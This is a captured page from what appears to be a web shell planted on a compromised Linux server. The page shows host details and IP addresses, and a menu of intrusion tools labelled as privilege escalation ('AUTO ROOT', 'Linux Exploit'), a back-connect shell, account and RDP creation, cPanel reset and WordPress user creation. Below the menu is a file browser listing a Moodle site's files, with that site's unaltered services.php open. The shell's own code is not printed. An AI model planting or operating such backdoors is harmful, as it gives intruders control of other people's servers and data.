Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.178.155
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
mod /
assign /
db /
[ HOME SHELL ]
Name
Size
Permission
Action
access.php
5.81
KB
-rw-r--r--
caches.php
1.12
KB
-rw-r--r--
events.php
1.36
KB
-rw-r--r--
install.xml
16.58
KB
-rw-rw-r--
log.php
3.16
KB
-rw-r--r--
messages.php
1.01
KB
-rw-r--r--
services.php
11.03
KB
-rw-rw-r--
subplugins.json
136
B
-rw-r--r--
tasks.php
1.14
KB
-rw-r--r--
upgrade.php
2.33
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : services.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Web service for mod assign * @package mod_assign * @subpackage db * @since Moodle 2.4 * @copyright 2012 Paul Charsley * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ $functions = array( 'mod_assign_copy_previous_attempt' => array( 'classname' => 'mod_assign_external', 'methodname' => 'copy_previous_attempt', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Copy a students previous attempt to a new attempt.', 'type' => 'write', 'capabilities' => 'mod/assign:view, mod/assign:submit' ), 'mod_assign_get_grades' => array( 'classname' => 'mod_assign_external', 'methodname' => 'get_grades', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Returns grades from the assignment', 'type' => 'read', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_get_assignments' => array( 'classname' => 'mod_assign_external', 'methodname' => 'get_assignments', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Returns the courses and assignments for the users capability', 'type' => 'read', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_get_submissions' => array( 'classname' => 'mod_assign_external', 'methodname' => 'get_submissions', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Returns the submissions for assignments', 'type' => 'read', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_get_user_flags' => array( 'classname' => 'mod_assign_external', 'methodname' => 'get_user_flags', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Returns the user flags for assignments', 'type' => 'read', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_set_user_flags' => array( 'classname' => 'mod_assign_external', 'methodname' => 'set_user_flags', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Creates or updates user flags', 'type' => 'write', 'capabilities'=> 'mod/assign:grade', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_get_user_mappings' => array( 'classname' => 'mod_assign_external', 'methodname' => 'get_user_mappings', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Returns the blind marking mappings for assignments', 'type' => 'read', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_revert_submissions_to_draft' => array( 'classname' => 'mod_assign_external', 'methodname' => 'revert_submissions_to_draft', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Reverts the list of submissions to draft status', 'type' => 'write', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_lock_submissions' => array( 'classname' => 'mod_assign_external', 'methodname' => 'lock_submissions', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Prevent students from making changes to a list of submissions', 'type' => 'write', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_unlock_submissions' => array( 'classname' => 'mod_assign_external', 'methodname' => 'unlock_submissions', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Allow students to make changes to a list of submissions', 'type' => 'write', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_save_submission' => array( 'classname' => 'mod_assign_external', 'methodname' => 'save_submission', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Update the current students submission', 'type' => 'write', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_submit_for_grading' => array( 'classname' => 'mod_assign_external', 'methodname' => 'submit_for_grading', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Submit the current students assignment for grading', 'type' => 'write', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_save_grade' => array( 'classname' => 'mod_assign_external', 'methodname' => 'save_grade', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Save a grade update for a single student.', 'type' => 'write', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_save_grades' => array( 'classname' => 'mod_assign_external', 'methodname' => 'save_grades', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Save multiple grade updates for an assignment.', 'type' => 'write', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_save_user_extensions' => array( 'classname' => 'mod_assign_external', 'methodname' => 'save_user_extensions', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Save a list of assignment extensions', 'type' => 'write', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_reveal_identities' => array( 'classname' => 'mod_assign_external', 'methodname' => 'reveal_identities', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Reveal the identities for a blind marking assignment', 'type' => 'write', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_view_grading_table' => array( 'classname' => 'mod_assign_external', 'methodname' => 'view_grading_table', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Trigger the grading_table_viewed event.', 'type' => 'write', 'capabilities' => 'mod/assign:view, mod/assign:viewgrades', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_view_submission_status' => array( 'classname' => 'mod_assign_external', 'methodname' => 'view_submission_status', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Trigger the submission status viewed event.', 'type' => 'write', 'capabilities' => 'mod/assign:view', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_get_submission_status' => array( 'classname' => 'mod_assign_external', 'methodname' => 'get_submission_status', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Returns information about an assignment submission status for a given user.', 'type' => 'read', 'capabilities' => 'mod/assign:view', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_list_participants' => array( 'classname' => 'mod_assign_external', 'methodname' => 'list_participants', 'classpath' => 'mod/assign/externallib.php', 'description' => 'List the participants for a single assignment, with some summary info about their submissions.', 'type' => 'read', 'ajax' => true, 'capabilities' => 'mod/assign:view, mod/assign:viewgrades', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_submit_grading_form' => array( 'classname' => 'mod_assign_external', 'methodname' => 'submit_grading_form', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Submit the grading form data via ajax', 'type' => 'write', 'ajax' => true, 'capabilities' => 'mod/assign:grade', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_get_participant' => array( 'classname' => 'mod_assign_external', 'methodname' => 'get_participant', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Get a participant for an assignment, with some summary info about their submissions.', 'type' => 'read', 'ajax' => true, 'capabilities' => 'mod/assign:view, mod/assign:viewgrades', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), 'mod_assign_view_assign' => array( 'classname' => 'mod_assign_external', 'methodname' => 'view_assign', 'classpath' => 'mod/assign/externallib.php', 'description' => 'Update the module completion status.', 'type' => 'write', 'capabilities' => 'mod/assign:view', 'services' => array(MOODLE_OFFICIAL_MOBILE_SERVICE) ), );
Close